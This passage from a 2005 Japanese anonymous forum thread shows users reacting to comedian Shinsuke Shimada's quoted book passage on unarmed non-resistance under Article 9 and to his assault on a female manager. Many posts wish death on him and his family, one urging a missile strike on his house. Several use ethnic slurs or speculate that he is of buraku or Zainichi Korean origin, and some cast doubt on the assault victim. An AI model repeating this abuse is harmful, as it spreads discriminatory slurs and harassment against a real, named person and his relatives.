282 :番組の途中ですが名無しです:2005/05/06(金) 06:21:35 ID:DE9MeolG0
死んでしまえば苦しまずに済むけど、そうはいかない。
紳助は昔の黒人みたいに、生きたまま奴隷になるといいよ。

283 :番組の途中ですが名無しです:2005/05/06(金) 06:24:14 ID:t24gm0cr0
伸介って人民軍兵士にAKつきつけられたら
「そういうのも素敵やん」とか言いながらケツの穴だしそう

284 :番組の途中ですが名無しです:2005/05/06(金) 06:24:45 ID:a1bL5Bm80
虫唾が走るとはまさにこいつのこと

285 :番組の途中ですが名無しです:2005/05/06(金) 06:31:15 ID:5HTVKGZ30 ?#
>無抵抗で死んでいくことが、我々のメッセージ
勝手に我々とか言うのやめてくんねーかな

286 :番組の途中ですが名無しです:2005/05/06(金) 06:31:48 ID:pY0lOrfa0 ?#
ちんすけみたいな 真のヘタレは目先もババァはぶん殴れても
戦争になるとトンズラすんだな

287 :番組の途中ですが名無しです:2005/05/06(金) 07:39:20 ID:kVYy9iPg0
こういった人って、日ゴトに意見が違うから
しかも真剣だしタチが悪い

288 :番組の途中ですが名無しです:2005/05/06(金) 07:42:07 ID:ABoIlADB0
シンスケは今でも数字取れてるのかね

289 :番組の途中ですが名無しです:2005/05/06(金) 07:44:51 ID:IFKSTnCI0
森永卓郎もそんなこと言ってたな
それは他人の命を尊重しないってことだぞ?
死ぬなら一人で死ねよ、俺は武器を手にするよ

290 :番組の途中ですが名無しです:2005/05/06(金) 07:47:03 ID:blIEfQyk0
弱い者には強く、暴力さえ振るうが、自分が痛い目に合いそうなら奴隷の立場になっても回避する。

今の日本の大人の悪いところを代表してるような奴だな。

291 :番組の途中ですが名無しです:2005/05/06(金) 07:51:21 ID:/hNbNVnt0 ?#
誠実さ、純粋さ、正義、平和、暴力反対、とか、
こんなのをかもし出したかったんだろうな。

実際は、暴走族で、木刀でじいさんを殴る、騒音を出して、
他人に不安を与え、たてつく者には暴力で押え込み、
自分本意な野朗。女は殴るり、人の顔に唾を吐く。
平気で嘘の涙を流し、人の同情をひく。暴力の塊

292 :番組の途中ですが名無しです:2005/05/06(金) 08:00:25 ID:V/9eTKxw0
こいつ女には強いんだよね・・・
殴るとまでは思ってなかったけど

293 :番組の途中ですが名無しです:2005/05/06(金) 08:02:32 ID:W0FO9jtI0
チョン助早く消えろ
うざってーんだよクソ犯罪者!!!
あびるとともに逝ってよし!

294 :番組の途中ですが名無しです:2005/05/06(金) 08:08:16 ID:C9Wood2+0
大多数の人間は暴力という手段は自分からは取らない
我慢に我慢を重ねて話し合いや法に訴えて社会の秩序を
守ってるんだよ
だからこそ緊急・火急のときだけ正当防衛という特例が
認められるんだ
個人レベルですら非暴力を貫けないどころか
積極的に他人を殴る奴が何を言ってるんだwww
新手のギャグだろwwwww

295 :番組の途中ですが名無しです:2005/05/06(金) 08:11:16 ID:xsIo2z4t0
ついに狂ったか

296 :番組の途中ですが名無しです:2005/05/06(金) 08:12:29 ID:gOHEaIt70
>>1
「いつも心に紳助を」って10年以上前の著書を引っ張り出されてもな〜

297 :番組の途中ですが名無しです:2005/05/06(金) 08:12:50 ID:UQqxakKp0
現実を見ない我武者羅で非論理的な平和主義者は
                     大虐殺者でもある 〜マイケル=ゼーバッハ

298 :番組の途中ですが名無しです:2005/05/06(金) 08:18:28 ID:NOU5fNdl0
このスレ紳助謹慎時に立てときゃもうちょっと復帰を遅らせることができたかもしれんな


299 :鬱鬱19 ◆haU19YoYvw :2005/05/06(金) 08:24:27 ID:O7cL+HGz0
伸介の家族が北ちょんに殺されたら同じことが言えるのか?被害に遭わないを見越している。
テポドン打てよ。伸介の家に。

300 :番組の途中ですが名無しです:2005/05/06(金) 09:03:28 ID:BKf2e8Ns0
自分の気に入らないやつは殴ってもイイと?
ただ、外国様には逆らいませんと?

ん?ということは、

自 分 よ り も  「  弱 い や つ 」

には殴る蹴る?
トコトンまでやっつける?
ということなのだろうか。

301 :番組の途中ですが名無しです:2005/05/06(金) 09:04:43 ID:7vvvk9Qv0
チョン介氏ね

302 :番組の途中ですが名無しです:2005/05/06(金) 09:05:29 ID:YYiz5mJk0 ?
京都高卒Bに何を言われてもww

303 :番組の途中ですが名無しです:2005/05/06(金) 09:08:40 ID:i8ccGagC0
いつも心に紳助を っていつの本だよwwww

10年前じゃねーかwwwwwwwwwwwww

304 :番組の途中ですが名無しです:2005/05/06(金) 09:09:37 ID:e5LVvMJI0
末期の軍部が一億玉砕論となえていたのとまったくかわらん。

305 :番組の途中ですが名無しです:2005/05/06(金) 09:10:03 ID:LrqqqDKb0
そうなんだ。
争いがおこったら、伸介さん、真っ先に死んじゃうんだね。
無抵抗で。
覚えておこう。

306 :番組の途中ですが名無しです:2005/05/06(金) 09:10:53 ID:OLBdAlIq0
お前らも正義の味方気取りのマスコミと変わらんね

307 :番組の途中ですが名無しです:2005/05/06(金) 09:12:15 ID:AeHE5DPhO
紳助ほどPQが高い芸能人はいないよ

308 :番組の途中ですが名無しです:2005/05/06(金) 09:13:35 ID:0Bn28hR50

 立 場 の 弱 い マ ネ ー ジ ャ ー は 、


 気 に 入 ら な い っ て だ け で


 ぶ ん 殴 る の に



309 :番組の途中ですが名無しです:2005/05/06(金) 09:46:32 ID:mDtYTFuP0
松本人志「紳助兄さんやっぱりかっこいいすっわ〜」

310 :番組の途中ですが名無しです:2005/05/06(金) 09:47:31 ID:BKf2e8Ns0
これって弱いものいじめの典型的な論理じゃね?

311 :愛しい」紳助様へ:2005/05/06(金) 10:34:26 ID:7AHD9kec0
目に見える怪我(外傷)もないのに ウザイだよ!
嘘はよくない
本当の被害者は紳助様だ
 紳助様を叩いてる人って共産主義者だろ中国デモの行動と似ている

 皆からの人気者で実力者・努力家・才能・人格者の紳助様に文句ある人は中国に亡命しろ

312 :番組の途中ですが名無しです:2005/05/06(金) 10:53:14 ID:Ho/ni3Rr0
無抵抗ってスペインに侵略されて滅亡したインカ帝国のような

313 :番組の途中ですが名無しです:2005/05/06(金) 10:58:14 ID:wvHK1UZM0 ?#
鼠でさえ、猫に追い詰められたら反抗するのに、
無抵抗のままで死ねってか。

何が元不良だ?暴走族だ?骨抜きだな。

314 :番組の途中ですが名無しです:2005/05/06(金) 11:03:20 ID:xrOMPyMv0
みなさん中国を見習いましょう。
反政府活動には粛清を。w

315 :番組の途中ですが名無しです:2005/05/06(金) 11:04:48 ID:n1gBalTv0
こないだ松伸で個展やってたけど
あまりに伸介の絵がパッとしなくてワロタ

316 :番組の途中ですが名無しです:2005/05/06(金) 11:09:34 ID://Ag/Gpu0
僕の肛門も武力行使されそうです

317 :番組の途中ですが名無しです:2005/05/06(金) 11:17:51 ID:mmjLuJY50
島田紳助 著書 タイトル「いつも心に紳助を」 毎日新聞社 刊

P147
武器は全部やめる。パトリオットも買わんと。来るなら来い、もういいです。
うちは最後まで平和憲法を守る。世界で類を見ない、憲法第9条を守りながら、
無抵抗で死んでいくことが、我々のメッセージだと。

P148
憲法変えて、確立した平和憲法のもとで、無抵抗で戦おう。
無抵抗で死んでいこう。そうすることが一番や。今あらためて、そう、思いますね。
無抵抗な人間には大義名分は成り立たへんのやから。
北朝鮮に経済制裁なんかしたらいかん。怒りよる。大義名分が成り立ってしまう
もん。経済制裁する、日本も一緒にやる、それだけで向こうは攻める理由が
できるもん。


318 :番組の途中ですが名無しです:2005/05/06(金) 11:29:23 ID:Ts6rfu9a0
島田はやっぱりあっちの民族だったのか

319 :番組の途中ですが名無しです:2005/05/06(金) 11:31:23 ID:ILqmMbm80
そのうちウリナラが攻めてくるけど
チョッパリは黙って死ねと

在日のお言葉です

320 :番組の途中ですが名無しです:2005/05/06(金) 11:32:08 ID:TlFPSz/m0
わかりやすしきよし

321 :番組の途中ですが名無しです:2005/05/06(金) 11:33:49 ID:gLG3DR4Y0
銭湯作れってしつこい

322 :番組の途中ですが名無しです:2005/05/06(金) 11:33:57 ID:FvJeHlZs0
お前だけ死ねってのが大多数の意見だろうな
死にたいやつは勝手に9条マンセーとかいいながら死ねばいい

323 :番組の途中ですが名無しです:2005/05/06(金) 11:37:44 ID:qGLFPh0h0
9条改正派で多数派なのって自民党だけなのなw
公明民主共産社民ぜーんぶ反対なのw
日本ってそのうち中国韓国の物になるんじゃねえか

324 :番組の途中ですが名無しです:2005/05/06(金) 11:39:16 ID:bjrEB+gSO
社保とかの無駄金、糞議員の給料さっさと軍事費に回せや

325 :番組の途中ですが名無しです:2005/05/06(金) 11:42:19 ID:q2caErrb0
今ブックオフで見てきたけど、リアルに書いてあった。
ページ数も>>317であってる
しかも、皮肉かと思ったら、マジで書いてる

あと、他のページでも的外れな政治分析をしている。
つっこみどころ満載なのでネタとしてはおもしろい

326 :番組の途中ですが名無しです:2005/05/06(金) 11:43:50 ID:Qz7mHIkr0
96年当時は、村山内閣か?
こういう言論が普通にまかり通っていたのだろうな。

327 :番組の途中ですが名無しです:2005/05/06(金) 13:27:10 ID:SeFkd8H60
珍介擁護は左翼の仕業だったのか。どおりで。

328 :番組の途中ですが名無しです:2005/05/06(金) 13:39:49 ID:WeyY6XAv0
吉本興業の奴らは、馬鹿なんだから政治的なことに
口出すなよ。お前らはただの操り人形だろ。テレビに出るときも
脚本家が面白いかどうかだけで、お前らは、面白いかどうか
には、影響してないんだから、おとなしくしとけ。

329 :番組の途中ですが名無しです:2005/05/06(金) 13:57:33 ID:2kNQqeYC0
チベットも無抵抗状態だから、
中国に盗られたんだよな

330 :番組の途中ですが名無しです:2005/05/06(金) 14:08:10 ID:VwHbDxLrO
いざという時こいつらは人間の楯になって私達を守ってくれるんだよね。

331 :番組の途中ですが名無しです:2005/05/06(金) 14:24:37 ID:+r5LU8cI0
つーか、これ痛烈な皮肉で言ったんじゃないのか??

332 :番組の途中ですが名無しです:2005/05/06(金) 16:02:33 ID:nciIknFJ0
伸介は京都の朝○人部○出身

333 :番組の途中ですが名無しです:2005/05/06(金) 16:06:23 ID:dJH3K28/0
芸人としては嫌いじゃないが
文化人、知識人ぶるなよw

334 :番組の途中ですが名無しです:2005/05/06(金) 16:09:32 ID:rwkpf20+0
人間として嫌いです

335 :番組の途中ですが名無しです:2005/05/06(金) 16:12:06 ID:OsWMRTgo0
太田なみのバカだな

336 :番組の途中ですが名無しです:2005/05/06(金) 16:12:46 ID:1NkDW6700
つーかこいつ勝手な事言うなよ、俺は無抵抗で死ぬなんて絶対嫌だぞ

337 :番組の途中ですが名無しです:2005/05/06(金) 16:21:00 ID:uQjBLKUB0
「いつも心に紳助を」っていつも心に紳助なんかいたらPTSDで
メンヘルになってしまうだろうが

338 :番組の途中ですが名無しです:2005/05/06(金) 16:23:27 ID:/bGJPaXz0
>>308
そんなの当然だろ、ばかじゃねーの

339 :愛しい」紳助様へ:2005/05/06(金) 16:57:17 ID:7AHD9kec0
2ヶ月ぶりに見た君の顔
  とても元気そうで安心した
  ずっと前の記憶が感情が鮮明に蘇った
  やっと変わった、思い出から好きへ。
  なのに、何で??
  あなたは悪くないのに 自分を責めるの?
  思いっきり抱きしめたい
  あなたの暖かさを感じたい。
  このまま時が止まればなんて思った。
  素敵やん、なんて・・・
  キレイ事言わないで。。。
  もっと色んなことしておけば良かったなんて、
  そんなこと言わないで。苦しい。
  昨日は平気な顔でテレビを見ていた。
  泣かずに一日が終った。
  平気かと思ったら、今日になってボロボロ。
  痛心・・・心が痛む。チクチクする。
  何で心が痛むんだろ。
  こうやって大人になるのかな。
  こうやって成長するのかな。

340 :番組の途中ですが名無しです:2005/05/06(金) 16:59:00 ID:7NJRS0gv0
女は平気でボコるのに憲法9条守って無抵抗で死のうって・・・



笑えるなwwwwwwwwwww

341 :番組の途中ですが名無しです:2005/05/06(金) 17:03:53 ID:otyCHm9v0
馬鹿が文化人気取りするのが一番惨めだよな

342 :番組の途中ですが名無しです:2005/05/06(金) 17:14:17 ID:RVda+HIYO
>>340だな。滑稽にも程がある。
すぐ暴力に走るようなクズが何寝呆けたこと言ってんだか。

343 :番組の途中ですが名無しです:2005/05/06(金) 17:23:15 ID:iYatEmj/0
よくゆうよ

344 :番組の途中ですが名無しです:2005/05/06(金) 18:16:46 ID:xpXNCHRf0
>珍助
まず自分で実践してくらさい

345 :番組の途中ですが名無しです:2005/05/06(金) 18:20:00 ID:2smMD7Cy0
娘がいる親の発言とは思えないよな。
無抵抗?
目の前で娘たちが攻めてきた奴らにレイプされても我慢するんかいな?

346 :ハワイアンセンター:2005/05/06(金) 18:21:38 ID:h1LQL1a70
平和憲法は素晴らしいと思うが実際にドンパチ始まったらなりふり構ってられん。

347 :番組の途中ですが名無しです:2005/05/06(金) 18:36:40 ID:aHanshkr0
島田伸助は大好きなタレントだが、この発言はアホ過ぎ。
>、憲法第9条を守りながら、無抵抗で死んでいくことが、我々のメッセージだと。
侵略されても皆殺しになどされるはずがない。殺されたほうがまだ全然マシ。
収容所での拷問、強制労働、性奴隷などが必ずおきる。
>無抵抗な人間には大義名分は成り立たへんのやから。
大義名分なんて、情報操作でいくらでもできるよ。

仮に日本が100%無抵抗でなおかつアメリカなどの同盟国や国連が
日本側に立って助けてくれないのなら、これほど侵略しておいしい国はないぞ。



348 :番組の途中ですが名無しです:2005/05/06(金) 18:49:28 ID:o7wKSG770
紳助もうええわ。

ペーズリー呼べ。

349 :番組の途中ですが名無しです:2005/05/06(金) 18:52:31 ID:D7EQdQeB0
>>347
適当な理由デッチアゲにも無抵抗ってことだもんな。
島田シン巣kはアホなんだから政治的な発言するなよ。

350 :番組の途中ですが名無しです:2005/05/06(金) 18:53:39 ID:IHWEa93P0
                     -=・=‐,   =・=-  
                      "''''"   | "''''" 
                            ヽ   
                          ^-^    
                       ‐-===- 

351 :番組の途中ですが名無しです:2005/05/06(金) 18:56:45 ID:V0s1B9Zu0
どうして松本は、紳助に対してお世辞ばっかり言うの?

352 :番組の途中ですが名無しです:2005/05/06(金) 18:58:33 ID:XsvgW7La0
田嶋陽子もしんすけと同じ考え方だった

・自衛隊廃棄
・日米安保解消 在日米軍追放

理由
・自分から小さい頃戦争を味わったから、軍隊に拒絶反応がある

攻められたらどうするのか?
・攻められないように誠意ある行動をすればいい

353 :番組の途中ですが名無しです:2005/05/06(金) 19:02:02 ID:rbiRbpgm0
誠意で解決するなら警察もいらんがな

354 :番組の途中ですが名無しです:2005/05/06(金) 19:21:38 ID:TQ4vYrcQ0
>>351
> どうして松本は、紳助に対してお世辞ばっかり言うの?

裏で暴力振るわれるからだろうw

355 :番組の途中ですが名無しです:2005/05/06(金) 19:22:44 ID:oJbXLYqw0
 浅田:万が一他国が攻めてきたら、日本人みんなが素手で応戦すればいいんです
 記者:素手ですか
 浅田:それで日本人が全滅したっていい。崇高な理想のために民族が滅びたと思えばいいんです

一億総玉砕ですかw

356 :番組の途中ですが名無しです:2005/05/06(金) 19:32:57 ID:mOyscIIl0
まあ、貴重な意見として耳に入れておこうか(笑)

357 :番組の途中ですが名無しです:2005/05/06(金) 19:40:44 ID:DbbanlZ40
これって普通に考えて皮肉じゃないのか?
お前ら馬鹿過ぎるぞ。
これ見て同調して「ああ、そうだね無抵抗なまま死んでいこう」なんて思う奴いないだろ。
憲法九条ってダメなんちゃうって思わせる方が多いだろ。

358 :番組の途中ですが名無しです:2005/05/06(金) 20:24:17 ID:Ehl650m20 ?
>>345
「そんな父ちゃん、もういらへん」って言われるよな。

359 :番組の途中ですが名無しです:2005/05/06(金) 20:28:46 ID:svUacbbF0
つーか普通に捏造コピペじゃないのこれ
紳助ってこんな思想ではないよ
オウム事件の時には「人権なんかクソくらえじゃ!信者の指一本づつ折って拷問せえ」
って言ってたぞ
>>1が本当だとしたらその場のノリでなんでも言う男っていうだけの話

360 :番組の途中ですが名無しです:2005/05/06(金) 20:32:20 ID:Kjbri1Fq0
紳助信者の遠慮がちな擁護レスがちらほら…

うぷぷぷ チョーウケル!!

361 :番組の途中ですが名無しです:2005/05/06(金) 21:10:16 ID:V2IoVtPM0
チンスケとその家族だけ氏ねよw

362 :番組の途中ですが名無しです:2005/05/07(土) 01:47:47 ID:ZYc2Vntl0
やっぱ、数年後に民主党から選挙出るのかしら
大阪府民なら大阪知事くらい普通に当選させそう

363 :番組の途中ですが名無しです:2005/05/07(土) 02:30:09 ID:EcbWM+Ww0
>>362
> やっぱ、数年後に民主党から選挙出るのかしら

「サンデープロジェクト」を降板したとき、
そういううわさが出たね。
師匠格の上岡龍太郎自身もよく出馬の噂が出てたから
影響された部分はあったんじゃないかな?

> 大阪府民なら大阪知事くらい普通に当選させそう

大阪府民としてやめてほしいわw
俺自身は西川きよしですらXだったのに・・・・

364 :番組の途中ですが名無しです:2005/05/07(土) 02:52:22 ID:TKm0Khz80
>>359
「いつも心に紳助を」っていう本で>>1のとおりに載ってますよ。
これはともかく悪い本じゃあないと思うけどね。
ちなみに93年ごろの著作だけど、現総理大臣の小泉さんにも
「読んだよ」っていわれて嬉しかったとか、「小泉さん、あなたのことは
大好きです」とか書いてたりする

365 :番組の途中ですが名無しです:2005/05/07(土) 06:39:54 ID:tCFm1EHa0
紳助様は やっぱスゴイ人だよね
小泉さん よかったね

366 :番組の途中ですが名無しです:2005/05/07(土) 06:44:54 ID:ex5JKdXv0
死ぬなら一人で死んでくださいね^^

367 :番組の途中ですが名無しです:2005/05/07(土) 06:52:11 ID:aI3Y4ER50
今ごろ、その年でサヨ思想ですか
俺が高校生の頃に考えてた思想ですが、、、

368 :番組の途中ですが名無しです:2005/05/07(土) 06:53:27 ID:+UzwGOPu0
紳助の道連れで死にたない。

369 :番組の途中ですが名無しです:2005/05/07(土) 06:55:06 ID:t/PsVQZ40
そら結構だが、だれも無抵抗のものを殺した卑怯者にはなりたくない。
殺されたあとで「日本が悪かったから殺された」って歴史創造されて悪者扱いだよ。

どこまで呆けているんだか。

370 :番組の途中ですが名無しです:2005/05/07(土) 06:57:18 ID:poCJHgg60
>>1
コレってホントにそう書いてあったの?
いわゆる「ガイドライン」とかじゃなくって?

371 :番組の途中ですが名無しです:2005/05/07(土) 06:57:40 ID:St/6zl1a0
よしりんに軽く論破されたインサイダー高野に洗脳された
京都のカミナリ族出身で盛り上がってるスレはここかな

372 :番組の途中ですが名無しです:2005/05/07(土) 07:01:52 ID:45h2Gck00
大阪の芸人て、何かっつーと政治を語りたがるよね。
なんかコンプレックスあるんじゃねーの?

373 :番組の途中ですが名無しです:2005/05/07(土) 07:35:54 ID:7LKklQvN0
しんすけエロイ!
よく逝った
無抵抗で非武装非暴力で死んでいこう

ガンジー思想全うしようぜ

374 :番組の途中ですが名無しです:2005/05/07(土) 08:22:15 ID:/i7YexGL0
そもそも芸能人のエッセイ買うやつは低脳

375 :番組の途中ですが名無しです:2005/05/07(土) 08:24:39 ID:qxWupCNl0 ?
一人で死んでくれ。

376 :番組の途中ですが名無しです:2005/05/07(土) 08:51:29 ID:VayIh2N+0
ん? 女を殴って、唾を吐いた人間が何言ってるの。

377 :番組の途中ですが名無しです:2005/05/07(土) 09:00:44 ID:RlDUSrhE0
>無抵抗で戦おう。
日本語が可笑しい、無抵抗なら戦ってない単なる犬死
>無抵抗な人間には大義名分は成り立たへんのやから。
大義名分は後から付いて来る、殺して支配してしまえばどうでも良い
何故イラクは未だ占領下なのか?現実を見ようねw
>北朝鮮に経済制裁なんかしたらいかん。怒りよる。
罰しなければ大人しいのですか?そもそも何で独裁国家が存在するのですか?
それは一つ、放って置いたからです。
誰も無害な独裁国家なら相手にしません・・
>日本も一緒にやる、それだけで向こうは攻める理由ができるもん。
独裁国家に理屈は要りません。拉致、麻薬密売、テロに大義名分がありましたか?
体制維持の為なら手段を選びません。



378 :番組の途中ですが名無しです:2005/05/07(土) 09:04:31 ID:M/VCYhCx0
紳助が言っても説得力ないよ。

379 :番組の途中ですが名無しです:2005/05/07(土) 09:07:33 ID:xBsCHSAn0
全体の内容知らんけど、要は皮肉なんじゃ?

380 : :2005/05/07(土) 09:08:13 ID:0OdMe1fH0
単なる皮肉だとワカラナイ連中は、もいっぺん学校逝って読解力鍛えてこい。


381 :番組の途中ですが名無しです:2005/05/07(土) 09:09:39 ID:UEE7ZZYV0
橋元弁護士から一言


382 :番組の途中ですが名無しです:2005/05/07(土) 09:11:44 ID:N+4XbWGN0

ヽ   ノ ヽ            /     ヾ   ヽ、
    ゞ、   丶         /彡     彡ノヽ  ミ ヽ
      ヽ ノ  \      /  ,,ノ-~  ̄   ヽ#    |
     |\_ ノ\    |  /へ_ ,=、 _ノヾ \ミ  ノ
   /⌒\        丶 /彡| -・=/ ヽ =・-  |   )
  │  \  人  |/⌒ヽゞ l   <_ っヽ Uノ |彡 ノ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  /    \    /    | `ーl  / _   ヽ |  |_ノ <圧倒的に!!
 (  \   ヽ  /    /  l ノ.(二7´\  ,/    \________________
 (       |  /   )    ヽ'  ⌒   ' ノ入
  ヽ \  ヾ 丿(( ̄)/ r‐‐'"/`┬ - ―~./   ヽ_


383 :番組の途中ですが名無しです:2005/05/07(土) 09:12:58 ID:1GUMeg1i0
皮肉とか電波とか、そういう話じゃないな
珍助ごときが、偉そうなこと言うなってことだ

384 :番組の途中ですが名無しです:2005/05/07(土) 09:17:35 ID:iqgbmOIk0
皮肉とか言ってるやつは実際の本を見てないやつ




385 :番組の途中ですが名無しです:2005/05/07(土) 09:31:54 ID:xBsCHSAn0
無抵抗で“死んでいこう”っていうところは正しいね。
非武装中立で生き残るつもりの奴よりは

386 :番組の途中ですが名無しです:2005/05/07(土) 09:36:40 ID:+WKowuWR0
そもそも憲法9条=不戦じゃないんだし、どういう経緯・誰が作った・意味を分かってないな?
ポツダム宣言と9条並べてみれば平和憲法でないのは一目瞭然

387 :番組の途中ですが名無しです:2005/05/07(土) 09:48:54 ID:+WKowuWR0
有事の紳助
ttp://wibo.m78.com/clip/img/49482.gif

388 :番組の途中ですが名無しです:2005/05/07(土) 10:55:57 ID:5AbRxg1G0
>無抵抗で死んでいくことが、我々のメッセージだと

死んだら負け。とにかく負け。日本は負けたというメッセージが残るだけ。
無駄死にして滅んだ国があると歴史の教科書に載るだけ。
いくら後世同情されても死んだ命は蘇らない。

とりあえず紳助に言いたいことは「暴力反対!」

389 :番組の途中ですが名無しです:2005/05/07(土) 12:00:30 ID:qH9g/p9I0
なんか理想を貫いて死んでいこうってこれこそ戦前の特攻に通ずるものが…

390 :番組の途中ですが名無しです:2005/05/07(土) 17:58:01 ID:QRimdstP0
ワロス

391 :番組の途中ですが名無しです:2005/05/07(土) 18:04:21 ID:U7VLbRvv0
いいよ!人を殺すよりはいい!!

392 :番組の途中ですが名無しです:2005/05/07(土) 18:07:45 ID:fcdOFi4R0
朝日に洗脳されたきちがいの言うことに耳を貸しててもね。国防において一番簡単で安く上がるのは核武装、ただそれだけのことだよ。
自衛隊なんて少数で徴兵制を復活させればそれで十分。今の日本の平和憲法なんて紳助が暴力反対て言ってるようなもんだ。これで納得しない人は憲法がどうあるのがいいの?

393 :番組の途中ですが名無しです:2005/05/08(日) 00:30:10 ID:EOgNjgou0




無抵抗主義のオレって素敵やん




394 :番組の途中ですが名無しです:2005/05/08(日) 00:37:41 ID:X13109Wz0
戦前の「天皇の為に死ね」と、この「九条の為に死ね」は精神構造的に同じものじゃないの?
九条は他者からの不当な生存権の侵害を防ぐための知恵であって、絶対無比の、命に代えてでも
まもるような物じゃないだろ。
というかそれだと大元の九条に信念に反してるじゃん。

395 :番組の途中ですが名無しです:2005/05/08(日) 00:38:57 ID:8DX5ru6N0
どうしてこう極端な考えしかできないんだろうか・・・

396 :番組の途中ですが名無しです:2005/05/08(日) 00:41:12 ID:pJiA5pUy0 ?##
無抵抗「な」女を殴るコツ

397 :番組の途中ですが名無しです:2005/05/08(日) 00:42:08 ID:Rp6rU3wb0
ヒント:部落

398 :番組の途中ですが名無しです:2005/05/08(日) 00:48:52 ID:S+dHwmx4O
>>391をダミープラグに切り替えろ

399 :番組の途中ですが名無しです:2005/05/08(日) 01:00:41 ID:Z+ecfOrN0
てか、これ1994年に発行された本だぜ。
今とはだいぶ情勢が違うだろ。社会党が政権持ってるような時代だし。

400 :番組の途中ですが名無しです:2005/05/08(日) 01:18:41 ID:XOPk1hG40
金持ちの言いそうな妄言だな。
島田の稼いだ金で経済支援やるなら文句はないが、
国民の血税で支援してるわけで。

401 :番組の途中ですが名無しです:2005/05/08(日) 01:26:00 ID:+mn411ZD0 ?
といってるが、真っ先に日本脱出して、安全な所から戦争ゲームをTV観戦する伸介。
てか、マネージャを暴行する人間が言う台詞じゃないなw

402 :番組の途中ですが名無しです:2005/05/08(日) 06:10:06 ID:8eEl/Gnn0
・拳で顔を5〜6発 ネガネのへしゃげるほど殴られた
・リュックの中の防虫スプレーのカンがつぶれるほど壁に打ち付けられた
その結果
・目に見える傷の報道がない (皮下出血(あざ)、皮下血腫(コブ)、皮膚擦過傷(かすり傷)等は一切報告されていない)

女40の話を信用してもいいの?
なんか紳助さんが可愛そうです

まあ 目に見える傷(皮下出血(あざ)、皮下血腫(コブ)、皮膚擦過傷(かすり傷)があれば 女40に同情する人(自分も含む)は多かったと思うよ。

403 :番組の途中ですが名無しです:2005/05/08(日) 06:37:32 ID:j1IJYh2k0
・京都駅周辺の少々"ややこしいとこ"出身。
・親は旧国鉄職員

この2つの情報だけで京都人は「ふーん、なるほど。」
と感じる事ができます。
おまけにあの顔。 認定しても差し支えないでしょう。

404 :番組の途中ですが名無しです:2005/05/08(日) 06:39:22 ID:cx7cPEYn0
>>399
そんなことは関係ない

405 :番組の途中ですが名無しです:2005/05/08(日) 06:52:39 ID:gTqtk2xZ0
無抵抗な女を殴った伸介が言ってもなー

406 :番組の途中ですが名無しです:2005/05/08(日) 06:54:50 ID:DbinEOIL0
伸介の釣り見事だなー

407 :番組の途中ですが名無しです:2005/05/08(日) 07:00:14 ID:1N8PKx1Y0
チン輔勝手に氏んでろ (*´・ω・)(・ω・`*)ネー

408 :番組の途中ですが名無しです:2005/05/08(日) 11:59:43 ID:pJiA5pUy0 ?##
ウトロ人

409 :番組の途中ですが名無しです:2005/05/08(日) 12:12:01 ID:pJiA5pUy0 ?##
「竹田の子守唄」のアタリの生まれなんだろ、チンシケ

410 :番組の途中ですが名無しです:2005/05/08(日) 12:13:20 ID:XDrmD/V00
友人や家族が殺されずにすむなら俺は抵抗したい。
殺すなら伸介とあいつの家族だけにしてくれ。

411 :■去年は紳助好きだったけど今年は嫌い:2005/05/08(日) 12:22:41 ID:IEtq4C430
[2005/4/3 日刊スポーツ]
お笑い芸人人気ランクで、島田紳助(49)に“暴行事件後遺症”が出ていること
が2日、分かった。毎春恒例の日経エンタテインメント!誌(5月号、4日発売)の
「嫌いな芸人ランク」で、紳助は昨年20位から4位へ上昇した。「好きな芸人ランク」
でも昨年同様3位だったが、同誌関係者によると、回答者のコメントでは、40代以上
に辛口の意見が多く「(謹慎2カ月余での復帰は)早すぎる」との声が多かったという。

紳助は昨年10月25日、女性マネジャーを殴り、謹慎していたが、今年1月2日の
日本テレビ「行列のできる法律相談所」で復帰した。視聴率はまずまずをキープして
いるが、今回の「嫌い」調査では、昨年比4倍近い392を得票。「来年消えるお笑い
芸人」でも、昨年の圏外から18位(150票)に食い込んでおり、事件によるイメー
ジダウンが無視できないものであることを物語った。

http://www.nikkansports.com/ns/entertainment/p-et-tp0-050403-0016.html


412 :番組の途中ですが名無しです:2005/05/08(日) 12:24:27 ID:pJiA5pUy0 ?##
焼肉のCMとかマジ辞めて欲しい

413 :番組の途中ですが名無しです:2005/05/08(日) 12:28:15 ID:IMdzrOZu0
暴力・謹慎を機に、紳助には
無抵抗に芸能界から消えてほしかった。

414 :番組の途中ですが名無しです:2005/05/08(日) 12:31:48 ID:8eEl/Gnn0
・拳で顔を5〜6発 ネガネのへしゃげるほど殴られた
・リュックの中の防虫スプレーのカンがつぶれるほど壁に打ち付けられた
その結果
・目に見える傷の報道がない (皮下出血(あざ)、皮下血腫(コブ)、皮膚擦過傷(かすり傷)等は一切報告されていない)

女40の話を信用してもいいの?
なんか紳助さんが可愛そうです

まあ 目に見える傷(皮下出血(あざ)、皮下血腫(コブ)、皮膚擦過傷(かすり傷)があれば 女40に同情する人(自分も含む)は多かったと思うよ。

415 :番組の途中ですが名無しです:2005/05/08(日) 12:33:44 ID:pJiA5pUy0 ?##
島田の親友というかビジネスパートナーである
山口組系山健組極心連合会会長代行橋本親分って強い?

416 :番組の途中ですが名無しです:2005/05/08(日) 12:35:00 ID:R1zJJ5Hl0
女叩きまくるやつに言われたかねーよwwwwwwwwwww

417 :番組の途中ですが名無しです:2005/05/08(日) 12:38:33 ID:RpSfcHFWO
無抵抗で死ぬとかありえん。俺は人間として抵抗しまくる。死んだら何も残らない

418 :番組の途中ですが名無しです:2005/05/08(日) 12:44:30 ID:zkQC88wc0

 中国人の強盗は今すぐ紳乃助さん宅へどうぞww


419 :番組の途中ですが名無しです:2005/05/08(日) 12:46:10 ID:pJiA5pUy0 ?##
法律も守れない長谷川が何を言うのかと、

420 :番組の途中ですが名無しです:2005/05/08(日) 12:46:15 ID:5zG1Wunk0
とにかく気持ち悪い不細工ジジイの紳助を処分したらいいと思います
あんな暴力魔のジジイいりませんから
今日も女子供を殴ってます


421 :番組の途中ですが名無しです:2005/05/08(日) 12:48:57 ID:JLat8pl5O
全治一週間程度の怪我でギュンギュンわめくな。

422 :番組の途中ですが名無しです:2005/05/08(日) 12:49:16 ID:tqCGFvNz0
トラックバック:http://news18.2ch.net/test/read.cgi/news2/1102258586/

423 :番組の途中ですが名無しです:2005/05/08(日) 12:49:43 ID:5zG1Wunk0
@紳竜時代、客席で野次った客に暴行
A同じく、バラエティ番組でデレクターに暴行
Bスッチー事件 些細なことで難癖つけて相手を罵り泣くまで説教する
